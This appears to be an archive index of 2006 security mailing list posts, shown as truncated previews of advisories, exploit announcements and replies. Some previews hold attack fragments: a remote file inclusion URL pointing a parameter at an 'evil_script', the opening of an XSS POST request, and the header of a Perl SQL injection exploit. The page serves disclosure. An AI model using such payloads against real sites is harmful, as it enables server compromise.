Mercury Messenger

Problem description: Mercury Messenger, http://www.mercury.to/, is a java based messenger that will allow it's users to chat with MSN users. Currently it has been noted by two people that on a multi user OS X platform it is possible to read the chat logs from other users. The user specific

Re: Bybass HTTP ( extension files ) in ISA 2004

I cannot reproduce this on either ISA2004 or ISA2006. Configuring the HTTP filter to block file extensions functions as expected with or without the "#". You've probably misconfigured your firewall, or have some other issue. Can you please provide details on your configuration? T --- New Black

Several updates in MS PowerPoint 0-day Vulnerability FAQ at SecuriTeam Blogs

Several updates to Microsoft PowerPoint 0-day Vulnerability FAQ document has been done. New items added, related Trojan horse payload information updated etc. Link to the document is http://blogs.securiteam.com/?p=508 - Juha-Matti

PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion

#SolpotCrew Community # #PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion # #Vendor site : http://www.softcomplex.com/products/php_event_calendar/ # #

Calendar Module <= 1.5.7 Remote File Include Vulnerabilities

- Calendar Module <= 1.5.7 Remote File Include Vulnerabilities - Author : Matdhule Contact : [EMAIL PROTECTED] Application : Calend

Plesk Control Panel <= 8.0.0 XSS vulnerability

Product: Plesk control panel Version: <= 8.0.0 Vendor: SWSoft Inc. URL: http://www.swsoft.com/en/products/plesk/ VULNERABILITY CLASS: XSS [Product Description] Plesk is comprehensive server management software developed specifically for the Hosting Service Industry with the assistance

Re: Phorum 5.1.14 XSS SQL injection Vulnerability

About the Phorum security issues as reported by Ellipsis: -- Cross Site Scripting (XSS) -- POST http://target.xx:80/posting.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: target.xx Content-Length: 447 message_id=0&fo

Secunia Research: IceWarp Web Mail Two File Inclusion Vulnerabilities

== Secunia Research 17/07/2006 - IceWarp Web Mail Two File Inclusion Vulnerabilities - == Table of Contents Affected Software.

[SECURITY] [DSA 1109-1] New rssh packages fix privilege escalation

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1109-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff July 16th, 2006

RE: Bybass HTTP ( extension files ) in ISA 2004

Tested this on ISA 2004. I cannot reproduce this. The ISA server blocks a given extension, with or without the # at the end of the file extension. Special config maybe? Edward [EMAIL PROTECTED] schreef: hi ppl i just discover a bug in Microsoft Internet Security and Acceleration (ISA) Server

rPSA-2006-0130-1 kernel

rPath Security Advisory: 2006-0130-1 Published: 2006-07-17 Products: rPath Linux 1 Rating: Critical Exposure Level Classification: Local Root Deterministic Privilege Escalation Updated Versions: kernel=/[EMAIL PROTECTED]:devel//1/2.6.16.26-0.1-1 References: http://www.cve.mitre.org/cgi

[EEYEB-20060227] D-Link Router UPNP Stack Overflow

D-Link Router UPNP Stack Overflow Release Date: July 13, 2006 Date Reported: February 27, 2006 Patch Development Time (In Days): 136 Severity: High (Remote Code Execution) Vendor: D-Link Routers Affected: DI-524 Rev A DI-524 Rev C DI-524 Rev D DI-604 Rev E DI-624 Rev C DI-624 Rev D DI-784 Re

Secunia Research: VisNetic Mail Server Two File Inclusion Vulnerabilities

== Secunia Research 17/07/2006 - VisNetic Mail Server Two File Inclusion Vulnerabilities - == Table of Contents Affected Software..

[SECURITY] [DSA 1110-1] New samba packages fix denial of service

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1110-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff July 16th, 2006

Secunia Research: BitZipper unacev2.dll Buffer Overflow Vulnerability

== Secunia Research 17/07/2006 - BitZipper unacev2.dll Buffer Overflow Vulnerability - == Table of Contents Affected Software.

PacSec 2006 CALL FOR PAPERS (Deadline Aug. 4; Event Nov. 27-30)

url: http://pacsec.jp PacSec 2006 CALL FOR PAPERS World Security Pros To Converge on Japan TOKYO, Japan -- To address the increasing importance of information security in Japan, the best known figures in the international security industry will get together with leading Japanese researc

boastMachine <= 3.1 SQL Injection Exploit

#!/usr/bin/perl # # VulnScr: boastMachine version 3.1 and prior # Web: http://boastology.com/ # # Date: Sun July 16 10:43 PM 2006 # Credits: DarkFig ([EMAIL PROTECTED]) # Vuln: SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Predictable Backup Filename

ListMessenger v0.9.3 Remote File Inclusion Vulnerability

ListMessenger v0.9.3 Remote File Inclusion Vulnerability - Discoverd By : xoron - Conatact : x0r0n[at]hotmail.com - script: ListMessenger 0.9.3 - URL: http://www.listmessenger.com - Exp: www.target.com/[path]/enduser/listmessenger.php?lm_path=evil_script? - Code: require_o

Multiple vulnerabilities in UFO2000 svn 1057

### Luigi Auriemma Application: UFO2000 http://ufo2000.sourceforge.net Versions: <= SVN 1057 Platforms:Windows, *nix, *BSD, Mac and more Bugs: A] buffer-overflow in rec

[SECURITY] [DSA 1111-1] New Linux kernel 2.6.8 packages fix privilege escalation

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA -1[EMAIL PROTECTED] http://www.debian.org/security/ Dann Frazier Jul 16th, 2006